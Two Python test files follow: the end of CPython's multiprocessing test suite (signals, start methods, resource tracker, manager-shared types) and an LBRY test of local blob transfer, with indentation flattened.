conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
test_misc.py
|
import os
from hashlib import md5
from twisted.internet import defer, reactor
from twisted.trial import unittest
from lbrynet import conf
from lbrynet.core.server.BlobAvailabilityHandler import BlobAvailabilityHandlerFactory
from lbrynet.core.StreamDescriptor import StreamDescriptorIdentifier
from lbrynet.core.StreamDescriptor import download_sd_blob
from lbrynet.core.PaymentRateManager import OnlyFreePaymentsManager
from lbrynet.core.BlobManager import DiskBlobManager
from lbrynet.core.PeerManager import PeerManager
from lbrynet.core.RateLimiter import RateLimiter
from lbrynet.core.server.BlobRequestHandler import BlobRequestHandlerFactory
from lbrynet.core.server.ServerProtocol import ServerProtocolFactory
from lbrynet.database.storage import SQLiteStorage
from lbrynet.file_manager.EncryptedFileCreator import create_lbry_file
from lbrynet.file_manager.EncryptedFileManager import EncryptedFileManager
from lbrynet.lbry_file.client.EncryptedFileOptions import add_lbry_file_to_sd_identifier
from tests import mocks
from tests.util import mk_db_and_blob_dir, rm_db_and_blob_dir
FakeNode = mocks.Node
FakeWallet = mocks.Wallet
FakePeerFinder = mocks.PeerFinder
FakeAnnouncer = mocks.Announcer
GenFile = mocks.GenFile
test_create_stream_sd_file = mocks.create_stream_sd_file
DummyBlobAvailabilityTracker = mocks.BlobAvailabilityTracker
def init_conf_windows(settings={}):
"""
There is no fork on windows, so imports
are freshly initialized in new processes.
So conf needs to be initialized for new processes
"""
if os.name == 'nt':
original_settings = conf.settings
conf.settings = conf.Config(conf.FIXED_SETTINGS, conf.ADJUSTABLE_SETTINGS)
conf.settings.installation_id = conf.settings.get_installation_id()
conf.settings.update(settings)
class LbryUploader:
def __init__(self, file_size, ul_rate_limit=None):
self.file_size = file_size
self.ul_rate_limit = ul_rate_limit
self.kill_check = None
# these attributes get defined in `start`
self.db_dir = None
self.blob_dir = None
self.wallet = None
self.peer_manager = None
self.rate_limiter = None
self.prm = None
self.storage = None
self.blob_manager = None
self.lbry_file_manager = None
self.server_port = None
@defer.inlineCallbacks
def setup(self):
init_conf_windows()
self.db_dir, self.blob_dir = mk_db_and_blob_dir()
self.wallet = FakeWallet()
self.peer_manager = PeerManager()
self.rate_limiter = RateLimiter()
if self.ul_rate_limit is not None:
self.rate_limiter.set_ul_limit(self.ul_rate_limit)
self.prm = OnlyFreePaymentsManager()
self.storage = SQLiteStorage(self.db_dir)
self.blob_manager = DiskBlobManager(self.blob_dir, self.storage)
self.lbry_file_manager = EncryptedFileManager(FakePeerFinder(5553, self.peer_manager, 1), self.rate_limiter,
self.blob_manager, self.wallet, self.prm, self.storage,
StreamDescriptorIdentifier())
yield self.storage.setup()
yield self.blob_manager.setup()
yield self.lbry_file_manager.setup()
query_handler_factories = {
1: BlobAvailabilityHandlerFactory(self.blob_manager),
2: BlobRequestHandlerFactory(
self.blob_manager, self.wallet,
self.prm,
None),
3: self.wallet.get_wallet_info_query_handler_factory(),
}
server_factory = ServerProtocolFactory(self.rate_limiter,
query_handler_factories,
self.peer_manager)
self.server_port = reactor.listenTCP(5553, server_factory, interface="localhost")
test_file = GenFile(self.file_size, bytes(i for i in range(0, 64, 6)))
lbry_file = yield create_lbry_file(self.blob_manager, self.storage, self.prm, self.lbry_file_manager,
"test_file", test_file)
defer.returnValue(lbry_file.sd_hash)
@defer.inlineCallbacks
def stop(self):
lbry_files = self.lbry_file_manager.lbry_files
for lbry_file in lbry_files:
yield self.lbry_file_manager.delete_lbry_file(lbry_file)
yield self.lbry_file_manager.stop()
yield self.blob_manager.stop()
yield self.storage.stop()
self.server_port.stopListening()
rm_db_and_blob_dir(self.db_dir, self.blob_dir)
if os.path.exists("test_file"):
os.remove("test_file")
class TestTransfer(unittest.TestCase):
@defer.inlineCallbacks
def setUp(self):
mocks.mock_conf_settings(self)
self.db_dir, self.blob_dir = mk_db_and_blob_dir()
self.wallet = FakeWallet()
self.peer_manager = PeerManager()
self.peer_finder = FakePeerFinder(5553, self.peer_manager, 1)
self.rate_limiter = RateLimiter()
self.prm = OnlyFreePaymentsManager()
self.storage = SQLiteStorage(self.db_dir)
self.blob_manager = DiskBlobManager(self.blob_dir, self.storage)
self.sd_identifier = StreamDescriptorIdentifier()
self.lbry_file_manager = EncryptedFileManager(self.peer_finder, self.rate_limiter,
self.blob_manager, self.wallet, self.prm, self.storage,
self.sd_identifier)
self.uploader = LbryUploader(5209343)
self.sd_hash = yield self.uploader.setup()
yield self.storage.setup()
yield self.blob_manager.setup()
yield self.lbry_file_manager.setup()
yield add_lbry_file_to_sd_identifier(self.sd_identifier)
@defer.inlineCallbacks
def tearDown(self):
yield self.uploader.stop()
lbry_files = self.lbry_file_manager.lbry_files
for lbry_file in lbry_files:
yield self.lbry_file_manager.delete_lbry_file(lbry_file)
yield self.lbry_file_manager.stop()
yield self.blob_manager.stop()
yield self.storage.stop()
rm_db_and_blob_dir(self.db_dir, self.blob_dir)
if os.path.exists("test_file"):
os.remove("test_file")
@defer.inlineCallbacks
def test_lbry_transfer(self):
sd_blob = yield download_sd_blob(
self.sd_hash, self.blob_manager, self.peer_finder, self.rate_limiter, self.prm, self.wallet
)
metadata = yield self.sd_identifier.get_metadata_for_sd_blob(sd_blob)
downloader = yield metadata.factories[0].make_downloader(
metadata, self.prm.min_blob_data_payment_rate, self.prm, self.db_dir, download_mirrors=None
)
yield downloader.start()
with open(os.path.join(self.db_dir, 'test_file'), 'rb') as f:
hashsum = md5()
hashsum.update(f.read())
self.assertEqual(hashsum.hexdigest(), "4ca2aafb4101c1e42235aad24fbb83be")
# TODO: update these
# def test_last_blob_retrieval(self):
# kill_event = Event()
# dead_event_1 = Event()
# blob_hash_queue_1 = Queue()
# blob_hash_queue_2 = Queue()
# fast_uploader = Process(target=start_blob_uploader,
# args=(blob_hash_queue_1, kill_event, dead_event_1, False))
# fast_uploader.start()
# self.server_processes.append(fast_uploader)
# dead_event_2 = Event()
# slow_uploader = Process(target=start_blob_uploader,
# args=(blob_hash_queue_2, kill_event, dead_event_2, True))
# slow_uploader.start()
# self.server_processes.append(slow_uploader)
#
# logging.debug("Testing transfer")
#
# wallet = FakeWallet()
# peer_manager = PeerManager()
# peer_finder = FakePeerFinder(5553, peer_manager, 2)
# hash_announcer = FakeAnnouncer()
# rate_limiter = DummyRateLimiter()
# dht_node = FakeNode(peer_finder=peer_finder, peer_manager=peer_manager, udpPort=4445, peerPort=5553,
# node_id="abcd", externalIP="127.0.0.1")
#
# db_dir, blob_dir = mk_db_and_blob_dir()
# self.session = Session(
# conf.ADJUSTABLE_SETTINGS['data_rate'][1], db_dir=db_dir, node_id="abcd",
# peer_finder=peer_finder, hash_announcer=hash_announcer,
# blob_dir=blob_dir, peer_port=5553, dht_node_port=4445,
# rate_limiter=rate_limiter, wallet=wallet,
# dht_node=dht_node, external_ip="127.0.0.1")
#
# d1 = self.wait_for_hash_from_queue(blob_hash_queue_1)
# d2 = self.wait_for_hash_from_queue(blob_hash_queue_2)
# d = defer.DeferredList([d1, d2], fireOnOneErrback=True)
#
# def get_blob_hash(results):
# self.assertEqual(results[0][1], results[1][1])
# return results[0][1]
#
# d.addCallback(get_blob_hash)
#
# def download_blob(blob_hash):
# prm = self.session.payment_rate_manager
# downloader = StandaloneBlobDownloader(
# blob_hash, self.session.blob_manager, peer_finder, rate_limiter, prm, wallet)
# d = downloader.download()
# return d
#
# def start_transfer(blob_hash):
#
# logging.debug("Starting the transfer")
#
# d = self.session.setup()
# d.addCallback(lambda _: download_blob(blob_hash))
#
# return d
#
# d.addCallback(start_transfer)
#
# def stop(arg):
# if isinstance(arg, Failure):
# logging.debug("Client is stopping due to an error. Error: %s", arg.getTraceback())
# else:
# logging.debug("Client is stopping normally.")
# kill_event.set()
# logging.debug("Set the kill event")
# d1 = self.wait_for_event(dead_event_1, 15)
# d2 = self.wait_for_event(dead_event_2, 15)
# dl = defer.DeferredList([d1, d2])
#
# def print_shutting_down():
# logging.info("Client is shutting down")
#
# dl.addCallback(lambda _: print_shutting_down())
# dl.addCallback(lambda _: rm_db_and_blob_dir(db_dir, blob_dir))
# dl.addCallback(lambda _: arg)
# return dl
#
# d.addBoth(stop)
# return d
#
# def test_double_download(self):
# sd_hash_queue = Queue()
# kill_event = Event()
# dead_event = Event()
# lbry_uploader = LbryUploader(sd_hash_queue, kill_event, dead_event, 5209343)
# uploader = Process(target=lbry_uploader.start)
# uploader.start()
# self.server_processes.append(uploader)
#
# logging.debug("Testing double download")
#
# wallet = FakeWallet()
# peer_manager = PeerManager()
# peer_finder = FakePeerFinder(5553, peer_manager, 1)
# hash_announcer = FakeAnnouncer()
# rate_limiter = DummyRateLimiter()
# sd_identifier = StreamDescriptorIdentifier()
# dht_node = FakeNode(peer_finder=peer_finder, peer_manager=peer_manager, udpPort=4445, peerPort=5553,
# node_id="abcd", externalIP="127.0.0.1")
#
# downloaders = []
#
# db_dir, blob_dir = mk_db_and_blob_dir()
# self.session = Session(conf.ADJUSTABLE_SETTINGS['data_rate'][1], db_dir=db_dir,
# node_id="abcd", peer_finder=peer_finder, dht_node_port=4445,
# hash_announcer=hash_announcer, blob_dir=blob_dir, peer_port=5553,
# rate_limiter=rate_limiter, wallet=wallet,
# external_ip="127.0.0.1", dht_node=dht_node)
#
# self.lbry_file_manager = EncryptedFileManager(self.session, sd_identifier)
#
# @defer.inlineCallbacks
# def make_downloader(metadata, prm):
# factories = metadata.factories
